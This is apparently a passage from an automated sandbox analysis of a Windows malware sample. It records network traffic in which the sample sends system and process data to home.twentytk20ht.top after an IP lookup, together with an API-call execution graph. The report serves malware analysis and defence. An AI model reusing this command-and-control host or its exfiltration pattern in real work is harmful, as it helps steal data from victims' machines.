                                                  Dec 26, 2024 13:07:57.260222912 CET192.168.2.71.1.1.10x224cStandard query (0)httpbin.org28IN (0x0001)false
                                                  Dec 26, 2024 13:08:01.236671925 CET192.168.2.71.1.1.10xb22fStandard query (0)home.twentytk20ht.topA (IP address)IN (0x0001)false
                                                  Dec 26, 2024 13:08:01.236746073 CET192.168.2.71.1.1.10x248fStandard query (0)home.twentytk20ht.top28IN (0x0001)false
                                                  Dec 26, 2024 13:08:05.846132994 CET192.168.2.71.1.1.10x9ee7Standard query (0)home.twentytk20ht.topA (IP address)IN (0x0001)false
                                                  Dec 26, 2024 13:08:05.846191883 CET192.168.2.71.1.1.10x6580Standard query (0)home.twentytk20ht.top28IN (0x0001)false
                                                  Dec 26, 2024 13:08:07.692508936 CET192.168.2.71.1.1.10xa7b1Standard query (0)home.twentytk20ht.topA (IP address)IN (0x0001)false
                                                  Dec 26, 2024 13:08:07.692616940 CET192.168.2.71.1.1.10x3bc1Standard query (0)home.twentytk20ht.top28IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Dec 26, 2024 13:07:57.398777962 CET1.1.1.1192.168.2.70xaeb0No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                  Dec 26, 2024 13:07:57.398777962 CET1.1.1.1192.168.2.70xaeb0No error (0)httpbin.org3.218.7.103A (IP address)IN (0x0001)false
                                                  Dec 26, 2024 13:08:01.379858971 CET1.1.1.1192.168.2.70xb22fNo error (0)home.twentytk20ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                  Dec 26, 2024 13:08:05.984355927 CET1.1.1.1192.168.2.70x9ee7No error (0)home.twentytk20ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                  Dec 26, 2024 13:08:07.829796076 CET1.1.1.1192.168.2.70xa7b1No error (0)home.twentytk20ht.top185.121.15.192A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • httpbin.org
                                                  • home.twentytk20ht.top

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.749701185.121.15.192806676C:\Users\user\Desktop\jklg6EIhyR.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 26, 2024 13:08:01.666589975 CET12360OUTPOST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1
                                                  Host: home.twentytk20ht.top
                                                  Accept: */*
                                                  Content-Type: application/json
                                                  Content-Length: 556460
                                                  Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 35 32 31 34 38 37 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                  Data Ascii: { "ip": "8.46.123.189", "current_time": "1735214878", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 748 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "svchost.exe", "pid": 864 }, { "name": "svchost.exe", "pid": 912 }, { "name": "dwm.exe", "pid": 976 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 704 }, { "name": "svchost.exe", "pid": 860 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                  Dec 26, 2024 13:08:01.786763906 CET2472OUTData Raw: 76 49 62 37 79 5a 58 74 55 55 5c 2f 30 33 4a 5c 2f 77 52 67 5c 2f 34 4a 72 6f 69 4b 33 37 4f 54 79 73 71 71 72 53 50 38 59 50 6a 77 48 6b 49 41 42 64 78 46 38 54 34 34 77 37 6b 62 6d 45 63 61 49 43 54 73 52 56 77 6f 5c 2f 67 66 78 6b 2b 6d 76 6d
                                                  Data Ascii: vIb7yZXtUU\/03J\/wRg\/4JroiK37OTysqqrSP8YPjwHkIABdxF8T44w7kbmEcaICTsRVwo\/gfxk+mvmvhv4n8V+G\/DHhPgeL\/wDUuWSYPO88zzxEr8G0p5vnXDmUcVwwWV4DA8A8aVcXhsLk2f5RKvjsViMvcsZXxGGpYScMN9Yqf63\/AEfv2a\/h34j+AnhZ42eLH0kOLfDfFeMmB4t4i4O4M8PfALKfFutheD+E\/EP
                                                  Dec 26, 2024 13:08:01.786814928 CET2472OUTData Raw: 39 68 69 67 72 5c 2f 6c 7a 5c 2f 77 42 75 6c 53 52 76 4d 33 5c 2f 4f 48 5c 2f 65 5c 2f 38 73 67 61 6a 33 4f 79 37 4d 5c 2f 35 2b 76 38 41 6e 38 36 66 5c 2f 66 38 41 6b 2b 54 50 58 7a 66 58 76 5c 2f 50 2b 64 4d 5c 2f 75 50 73 7a 2b 39 38 33 76 30
                                                  Data Ascii: 9higr\/lz\/wBulSRvM3\/OH\/e\/8sgaj3Oy7M\/5+v8An86f\/f8Ak+TPXzfXv\/P+dM\/uPsz+983v0\/w\/woOuG3z\/AERD5e3f8j7fN\/5aD8Pr1pnz\/K\/+uc\/63\/P+e1S853\/vP88\/av6\/\/XpskZ+T58OP8\/nUT2+f6M3p9fl+pD5m5tn8Z\/55n\/XZ\/wA+vvUNTNvkLx9pPr+5+nX\/AD25pnXf8km\/
                                                  Dec 26, 2024 13:08:01.786870003 CET2472OUTData Raw: 2f 31 39 58 66 34 64 50 35 34 71 61 4f 4f 52 6d 32 5c 2f 75 32 65 50 30 7a 30 46 51 78 5c 2f 4e 4a 5c 2f 66 38 76 74 4a 36 38 5c 2f 30 39 36 7a 39 6e 35 5c 2f 68 5c 2f 77 54 53 6e 31 2b 58 36 6a 50 6e 6a 6a 53 4e 48 6a 48 37 32 35 5c 2f 65 66 38
                                                  Data Ascii: /19Xf4dP54qaOORm2\/u2eP0z0FQx\/NJ\/f8vtJ68\/096z9n5\/h\/wTSn1+X6jPnjjSNHjH725\/ef89vx9fX6Yoz\/ABo8kLy\/vfM\/1EAz\/PvxT2k+Zk+\/HH+6\/wBVx3\/0rPpT5I3XZsT+f2j69vb\/AOuazND9yH+8fw\/kKbT36\/h\/U0yuLkfl\/XyP8nz9dP2IPEd3P8F9R0ZbhmtNP8Xavp93pk+250+9tZ
                                                  Dec 26, 2024 13:08:01.786892891 CET2472OUTData Raw: 63 6e 53 70 56 36 4f 47 6e 50 4d 48 67 71 74 65 57 4b 70 35 55 76 72 39 53 2b 48 69 36 72 6c 31 6e 57 5c 2f 47 4f 76 66 47 44 77 39 70 2b 74 2b 46 66 32 74 66 32 64 49 5c 2f 6a 33 34 79 6d 30 44 53 72 72 55 46 5c 2f 59 70 38 54 2b 42 7a 34 31 38
                                                  Data Ascii: cnSpV6OGnPMHgqteWKp5Uvr9S+Hi6rl1nW\/GOvfGDw9p+t+Ff2tf2dI\/j34ym0DSrrUF\/Yp8T+Bz418MfBzXPEjRXbaD49+M3j3T5NU8DfB3UfLmj06fRhqlnBDK2nNqHmv8Az3f8FG\/A1r8OP2tPiD4TtdUu9c+yaf4P1G71rUNN8OaVqOq3\/iDwtpXiC+vL+08KaL4e0P7SbnU5IjNa6TbSTxRRS3bXF209zN\/Sz40+
                                                  Dec 26, 2024 13:08:01.787009001 CET4944OUTData Raw: 48 68 5c 2f 68 33 36 78 6a 35 2b 79 71 76 4f 6f 56 4b 54 79 66 38 41 32 56 35 42 69 36 63 63 42 6a 48 4f 55 31 57 78 46 65 69 38 50 7a 30 70 53 6e 44 2b 39 54 53 72 5c 2f 54 66 32 74 66 32 55 4e 4e 31 52 49 37 37 77 62 70 48 37 54 50 37 50 4e 6e
                                                  Data Ascii: Hh\/h36xj5+yqvOoVKTyf8A2V5Bi6ccBjHOU1WxFei8Pz0pSnD+9TSr\/Tf2tf2UNN1RI77wbpH7TP7PNnfrEzQarqXhTTfjN8No7hY2YC0tdSvtCtfEgUsBbW95Pa5AhjkwvmXxk\/Z4+NXx6+Huu\/DL4m\/En9nbXvC+vQ7ZI2\/Zl+IsV\/pd\/Erix1zQ74\/tZvJpmtaZI7S2V7EpxultrmO5sbm6tZ\/y51X9rDw18Cf
                                                  Dec 26, 2024 13:08:01.787061930 CET2472OUTData Raw: 64 57 42 6a 6d 74 30 63 59 4b 68 6c 36 48 34 61 32 48 78 36 5c 2f 5a 48 2b 45 5c 2f 77 41 61 6c 38 52 66 44 58 51 5c 2f 45 75 6e 61 58 71 48 68 2b 66 77 7a 71 46 68 71 4d 4e 7a 6f 2b 71 57 47 70 76 34 6f 74 74 66 38 54 61 37 5a 32 6c 39 4c 66 58
                                                  Data Ascii: dWBjmt0cYKhl6H4a2Hx6\/ZH+E\/wAal8RfDXQ\/EunaXqHh+fwzqFhqMNzo+qWGpv4ottf8Ta7Z2l9LfXVjpUUPh22u7OXTtF1Z9PuLeO9uzp1kt1YcN+zZ4u03wn8Y\/Cupa9fW+maLOuradqeoSsix20N7pF9Hbu5kmgj2\/wBoLZBhJIcrnYrS+WK\/brQofh14qsnitNR0vxPbX9tJHNY3MsM0V1Z3MTRzRz6VMFae0nhZ
                                                  Dec 26, 2024 13:08:01.787101030 CET2472OUTData Raw: 46 58 44 75 57 48 71 51 6c 51 6b 34 50 38 79 76 2b 43 54 5c 2f 78 36 38 57 32 33 37 55 48 77 50 38 41 32 54 34 64 65 58 78 68 38 4a 64 48 2b 4e 76 78 4c 2b 4c 66 67 48 57 72 6b 58 46 76 63 36 58 4c 70 5c 2f 37 4e 58 37 51 76 68 6d 35 58 53 39 50
                                                  Data Ascii: FXDuWHqQlQk4P8yv+CT\/x68W237UHwP8A2T4deXxh8JdH+NvxL+LfgHWrkXFvc6XLp\/7NX7Qvhm5XS9PleZ9M0zxnY+L7PxBqOh3UiS6Hrenzg28Wo6nrTSav\/BVg5\/bk+LQ\/u6V8MB\/5i3wcf61+yH7N3\/BIT9mv9l340+DPjr4A8b\/HHWPF3gb\/AISL+ydO8YeJfAWoeHLj\/hJvCmu+D7\/+0bTRfhn4f1ObydM
                                                  Dec 26, 2024 13:08:01.787154913 CET2472OUTData Raw: 43 39 76 76 47 58 5c 2f 43 56 2b 4f 39 59 30 5c 2f 56 39 50 5c 2f 74 44 53 4e 51 30 50 52 50 38 41 68 48 72 61 46 74 4e 74 50 2b 45 65 5c 2f 74 4b 47 56 72 6e 56 72 78 45 2b 6c 66 41 76 37 50 76 37 63 57 67 66 74 4e 33 33 78 53 38 61 5c 2f 77 44
                                                  Data Ascii: C9vvGX\/CV+O9Y0\/V9P\/tDSNQ0PRP8AhHraFtNtP+Ee\/tKGVrnVrxE+lfAv7Pv7cWgftN33xS8a\/wDBQr\/hP\/2cJ\/GPxE1qz\/ZX\/wCGTfhD4V+weEvElp4mh8AeCv8AheGk61N47uv+Fa3WqeG7z\/hJJdPGp+Mf+EV+z61FBHrl+Y\/tPwh4T8O+AvCfhfwN4Q0q30Lwn4L8O6L4T8L6JaNM9ro\/h3w5ptto+iaV
                                                  Dec 26, 2024 13:08:01.787173986 CET2472OUTData Raw: 5c 2f 7a 5c 2f 6e 39 65 35 35 63 69 78 70 76 53 53 5a 50 39 62 37 35 39 65 76 70 5c 2f 6b 39 38 5c 2f 5a 2b 66 34 66 38 41 42 4c 35 33 35 66 31 38 79 47 52 6e 59 75 37 76 73 48 2b 72 5c 2f 77 42 56 62 5a 5c 2f 7a 2b 6e 39 57 62 64 32 39 33 54 79
                                                  Data Ascii: \/z\/n9e55cixpvSSZP9b759evp\/k98\/Z+f4f8ABL535f18yGRnYu7vsH+r\/wBVbZ\/z+n9Wbd293TyXk\/z9O+Of6U9Ixtf9zHsx\/H9OLX\/r+70yTPmP\/wC0\/wBxB6fX361majI9nmHfnf8A6qX\/AOSvw\/pTBIW+dHy\/\/PP\/AKd8emevSn7k+dHf5Jfs\/wDy1\/8AJr+nWofnXfsTy\/3f+rj\/AOW3+ld\/0
                                                  Dec 26, 2024 13:08:01.906723976 CET7416OUTData Raw: 68 6f 58 2b 75 52 51 61 65 50 45 66 6a 76 58 37 48 77 33 6f 6a 61 6a 4e 70 38 47 71 33 30 4e 67 75 6f 36 68 41 31 35 4c 5a 36 5a 66 33 55 64 75 4a 48 74 37 4f 35 6c 43 51 50 79 75 67 5c 2f 45 44 77 7a 72 30 56 32 30 47 73 61 4d 73 74 6e 72 47 71
                                                  Data Ascii: hoX+uRQaePEfjvX7Hw3ojajNp8Gq30Nguo6hA15LZ6Zf3UduJHt7O5lCQPyug\/EDwzr0V20GsaMstnrGqaHLGmq27rLe6RdNaXRtfPW1uJYTKhMTPawyFCpeKNiUH4jhfBv6O2D4u5KHB\/Cf+slbByzSOV1p4nFYD6nTr06EsVQyHFYqtkFKMK9SlT\/cYCE4SnC0UpRb\/ozGePv0qcw4FcsRx9x1\/qjhsfTyapnOHp4XBZ
                                                  Dec 26, 2024 13:08:05.768627882 CET157INHTTP/1.1 200 OK
                                                  Server: nginx/1.22.1
                                                  Date: Thu, 26 Dec 2024 12:08:05 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Content-Length: 1
                                                  Connection: close
                                                  Data Raw: 30
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.749712185.121.15.192806676C:\Users\user\Desktop\jklg6EIhyR.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 26, 2024 13:08:06.105479956 CET101OUTGET /TQIuuaqjNpwYjtUvFojm1734579850?argument=0 HTTP/1.1
                                                  Host: home.twentytk20ht.top
                                                  Accept: */*
                                                  Dec 26, 2024 13:08:07.638019085 CET372INHTTP/1.1 404 NOT FOUND
                                                  Server: nginx/1.22.1
                                                  Date: Thu, 26 Dec 2024 12:08:07 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Content-Length: 207
                                                  Connection: close
                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.749718185.121.15.192806676C:\Users\user\Desktop\jklg6EIhyR.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 26, 2024 13:08:07.956662893 CET174OUTPOST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1
                                                  Host: home.twentytk20ht.top
                                                  Accept: */*
                                                  Content-Type: application/json
                                                  Content-Length: 31
                                                  Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                  Data Ascii: { "id1": "0", "data": "Done1" }
                                                  Dec 26, 2024 13:08:09.587387085 CET372INHTTP/1.1 404 NOT FOUND
                                                  Server: nginx/1.22.1
                                                  Date: Thu, 26 Dec 2024 12:08:09 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Content-Length: 207
                                                  Connection: close
                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.74969934.226.108.1554436676C:\Users\user\Desktop\jklg6EIhyR.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-26 12:07:59 UTC52OUTGET /ip HTTP/1.1
                                                  Host: httpbin.org
                                                  Accept: */*
                                                  2024-12-26 12:07:59 UTC224INHTTP/1.1 200 OK
                                                  Date: Thu, 26 Dec 2024 12:07:59 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 31
                                                  Connection: close
                                                  Server: gunicorn/19.9.0
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Allow-Credentials: true
                                                  2024-12-26 12:07:59 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                  Data Ascii: { "origin": "8.46.123.189"}


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:07:07:52
                                                  Start date:26/12/2024
                                                  Path:C:\Users\user\Desktop\jklg6EIhyR.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\jklg6EIhyR.exe"
                                                  Imagebase:0x770000
                                                  File size:4'495'872 bytes
                                                  MD5 hash:BEC048B8A886AC4F2F72A47A41057F6D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:2.2%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:20.3%
                                                    Total number of Nodes:232
                                                    Total number of Limit Nodes:33
                                                    execution_graph 60559 772f17 60563 772f2c 60559->60563 60560 7731d3 60561 772fb3 RegOpenKeyExA 60561->60563 60562 77315c RegEnumKeyExA 60562->60563 60563->60560 60563->60561 60563->60562 60564 773046 RegOpenKeyExA 60563->60564 60566 77313b RegCloseKey 60563->60566 60564->60563 60565 773089 RegQueryValueExA 60564->60565 60565->60563 60565->60566 60566->60563 60567 7731d7 60570 7731f4 60567->60570 60568 773200 60569 7732dc CloseHandle 60569->60568 60570->60568 60570->60569 60571 8270a0 60574 8270ae 60571->60574 60573 8271a7 60574->60573 60575 82717f 60574->60575 60578 83a8c0 60574->60578 60582 8271c0 socket ioctlsocket connect getsockname 60574->60582 60575->60573 60583 839320 closesocket 60575->60583 60579 83a903 recvfrom 60578->60579 60580 83a8e6 60578->60580 60581 83a8ed 60579->60581 60580->60579 60580->60581 60581->60574 60582->60574 60583->60573 60584 824720 60588 824728 60584->60588 60585 824733 60587 824774 60588->60585 60593 82476c 60588->60593 60594 829270 60588->60594 60590 824860 60597 824950 60590->60597 60592 824878 60593->60592 60601 8230a0 closesocket 60593->60601 60602 82a440 60594->60602 60596 829297 60596->60590 60598 824966 60597->60598 60599 824aa0 gethostname 60598->60599 60600 8249c5 60598->60600 60599->60598 60599->60600 60600->60593 60601->60587 60603 82a46b 60602->60603 60605 82a48b GetAdaptersAddresses 60603->60605 60634 82a4db 60603->60634 60604 82aa03 RegOpenKeyExA 60606 82ab70 RegOpenKeyExA 60604->60606 60607 82aa27 RegQueryValueExA 60604->60607 60622 82a4a6 60605->60622 60605->60634 60610 82ac34 RegOpenKeyExA 60606->60610 60631 82ab90 60606->60631 60608 82aa71 60607->60608 60609 82aacc RegQueryValueExA 60607->60609 60608->60609 60618 82aa85 RegQueryValueExA 60608->60618 60611 82ab66 RegCloseKey 60609->60611 60612 82ab0e 60609->60612 60613 82acf8 RegOpenKeyExA 60610->60613 60633 82ac54 60610->60633 60611->60606 60612->60611 60623 82ab1e RegQueryValueExA 60612->60623 60615 82ad56 RegEnumKeyExA 60613->60615 60619 82ad14 60613->60619 60614 82a4f3 GetAdaptersAddresses 60616 82a505 60614->60616 60614->60634 60617 82ad9b 60615->60617 60615->60619 60627 82a527 GetAdaptersAddresses 60616->60627 60616->60634 60620 82ae16 RegOpenKeyExA 60617->60620 60621 82aab3 60618->60621 60619->60596 60624 82ae34 RegQueryValueExA 60620->60624 60625 82addf RegEnumKeyExA 60620->60625 60621->60609 60622->60614 60622->60634 60626 82ab4c 60623->60626 60628 82af43 RegQueryValueExA 60624->60628 60635 82adaa 60624->60635 60625->60619 60625->60620 60626->60611 60627->60634 60629 82b052 RegQueryValueExA 60628->60629 60628->60635 60630 82adc7 RegCloseKey 60629->60630 60629->60635 60630->60625 60631->60610 60632 82afa0 RegQueryValueExA 60632->60635 60633->60613 60634->60604 60634->60619 60635->60628 60635->60629 60635->60630 60635->60632 60487 83a080 60490 839740 60487->60490 60489 83a09b 60491 839780 60490->60491 60495 83975d 60490->60495 60492 839925 RegOpenKeyExA 60491->60492 60491->60495 60493 83995a RegQueryValueExA 60492->60493 60492->60495 60494 839986 RegCloseKey 60493->60494 60494->60495 60495->60489 60496 83b180 60499 83b19b 60496->60499 60503 83b2e3 60496->60503 60500 83b2a9 getsockname 60499->60500 60502 83b020 closesocket 60499->60502 60499->60503 60504 83af30 60499->60504 60508 83b060 60499->60508 60513 83b020 60500->60513 60502->60499 60505 83af63 socket 60504->60505 60506 83af4c 60504->60506 60505->60499 60506->60505 60507 83af52 60506->60507 60507->60499 60512 83b080 60508->60512 60509 83b0b0 connect 60510 83b0bf WSAGetLastError 60509->60510 60511 83b0ea 60510->60511 60510->60512 60511->60499 60512->60509 60512->60510 60512->60511 60514 83b052 60513->60514 60515 83b029 60513->60515 60514->60499 60516 83b04b closesocket 60515->60516 60517 83b03e 60515->60517 60516->60514 60517->60499 60636 83a920 60637 83a944 60636->60637 60638 83a94b 60637->60638 60639 83a977 send 60637->60639 60518 77f7b0 60519 77f97a 60518->60519 60520 77f7c3 60518->60520 60520->60519 60524 7acd80 60520->60524 60522 77f942 60523 77f9bb WSACloseEvent 60522->60523 60523->60519 60525 7ad0e5 60524->60525 60526 7acd9a 60524->60526 60525->60522 60526->60525 60527 7ad016 60526->60527 60531 7ae130 closesocket 60526->60531 60532 786fa0 60526->60532 60536 78f6c0 WSACloseEvent select closesocket 60527->60536 60531->60526 60533 786fd4 60532->60533 60535 786feb 60532->60535 60534 787207 select 60533->60534 60533->60535 60534->60535 60535->60526 60536->60525 60537 7729ff FindFirstFileA 60538 772a31 60537->60538 60539 772a5c RegOpenKeyExA 60538->60539 60540 772a93 60539->60540 60541 772ade CharUpperA 60540->60541 60543 772b0a 60541->60543 60542 772bf9 QueryFullProcessImageNameA 60544 772c3b CloseHandle 60542->60544 60543->60542 60546 772c64 60544->60546 60545 772df1 CloseHandle 60547 772e23 60545->60547 60546->60545 60640 773d5e 60643 773d30 60640->60643 60642 773d90 60643->60640 60643->60642 60644 780ab0 60643->60644 60647 7805b0 60644->60647 60646 780acd 60646->60643 60650 7805bd 60647->60650 60652 7807c7 60647->60652 60648 780707 WSAEventSelect 60648->60650 60648->60652 60649 7807ef 60651 786fa0 select 60649->60651 60649->60652 60654 780847 60649->60654 60650->60648 60650->60649 60650->60652 60657 7776a0 60650->60657 60651->60654 60652->60646 60654->60652 60655 7809e8 WSAEnumNetworkEvents 60654->60655 60656 7809d0 WSAEventSelect 60654->60656 60655->60654 60655->60656 60656->60654 60656->60655 60658 7776e6 send 60657->60658 60659 7776c0 60657->60659 60660 7776c9 60658->60660 60659->60658 60659->60660 60660->60650 60548 7a95b0 60549 7a95c8 60548->60549 60551 7a95fd 60548->60551 60549->60551 60552 7aa150 60549->60552 60553 7aa15f 60552->60553 60555 7aa1d0 60552->60555 60554 7aa181 getsockname 60553->60554 60553->60555 60554->60555 60555->60551 60661 77255d 60662 af9f70 60661->60662 60663 77256c GetSystemInfo 60662->60663 60664 772589 60663->60664 60665 7725a0 GlobalMemoryStatusEx 60664->60665 60670 7725ec 60665->60670 60666 77263c GetDriveTypeA 60668 772655 GetDiskFreeSpaceExA 60666->60668 60666->60670 60667 772762 60669 7727d6 KiUserCallbackDispatcher 60667->60669 60668->60670 60671 7727f8 60669->60671 60670->60666 60670->60667 60672 7728d9 FindFirstFileW 60671->60672 60673 772906 FindNextFileW 60672->60673 60674 772928 60672->60674 60673->60673 60673->60674 60675 7a8b50 60676 7a8b6b 60675->60676 60694 7a8bb5 60675->60694 60677 7a8b8f 60676->60677 60678 7a8bf3 60676->60678 60676->60694 60710 786e40 select 60677->60710 60695 7aa550 60678->60695 60681 7a8bfc 60684 7a8c1f connect 60681->60684 60688 7a8c35 60681->60688 60691 7a8cb2 60681->60691 60681->60694 60682 7a8ba1 60683 7a8cd9 SleepEx 60682->60683 60682->60691 60682->60694 60687 7a8d14 60683->60687 60684->60688 60685 7aa150 getsockname 60693 7a8dff 60685->60693 60689 7a8d43 60687->60689 60687->60691 60690 7aa150 getsockname 60688->60690 60692 7aa150 getsockname 60689->60692 60690->60682 60691->60685 60691->60693 60691->60694 60692->60694 60693->60694 60711 7778b0 closesocket 60693->60711 60696 7aa575 60695->60696 60700 7aa597 60696->60700 60713 7775e0 60696->60713 60698 7778b0 closesocket 60699 7aa713 60698->60699 60699->60681 60701 7aa811 setsockopt 60700->60701 60702 7aa69b 60700->60702 60707 7aa83b 60700->60707 60701->60707 60702->60698 60702->60699 60704 7aaf56 60704->60702 60705 7aaf5d 60704->60705 60705->60699 60706 7aa150 getsockname 60705->60706 60706->60699 60707->60702 60709 7aabe1 60707->60709 60719 7a6be0 select closesocket 60707->60719 60709->60702 60718 7d67e0 ioctlsocket 60709->60718 60710->60682 60712 7778c5 60711->60712 60712->60694 60714 777607 socket 60713->60714 60715 7775ef 60713->60715 60716 77762b 60714->60716 60715->60714 60717 777643 60715->60717 60716->60700 60717->60700 60718->60704 60719->60709 60556 78d5e0 60557 78d652 WSAStartup 60556->60557 60558 78d5f0 60556->60558 60557->60558 60720 7ab400 60721 7ab40b 60720->60721 60722 7ab425 60720->60722 60725 777770 60721->60725 60723 7ab421 60726 7777b6 recv 60725->60726 60727 777790 60725->60727 60728 777799 60726->60728 60727->60726 60727->60728 60728->60723 60729 7ae400 60730 7ae412 60729->60730 60732 7ae459 60729->60732 60733 7a68b0 closesocket 60730->60733 60733->60732 60734 7ab3c0 60735 7ab3cb 60734->60735 60736 7ab3ee 60734->60736 60738 7776a0 send 60735->60738 60740 7a9290 60735->60740 60737 7ab3ea 60738->60737 60741 7776a0 send 60740->60741 60742 7a92e5 60741->60742 60743 7a9335 WSAIoctl 60742->60743 60746 7a9392 60742->60746 60744 7a9366 60743->60744 60743->60746 60745 7a9371 setsockopt 60744->60745 60744->60746 60745->60746 60746->60737

                                                    Executed Functions

                                                    Function 007AF100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
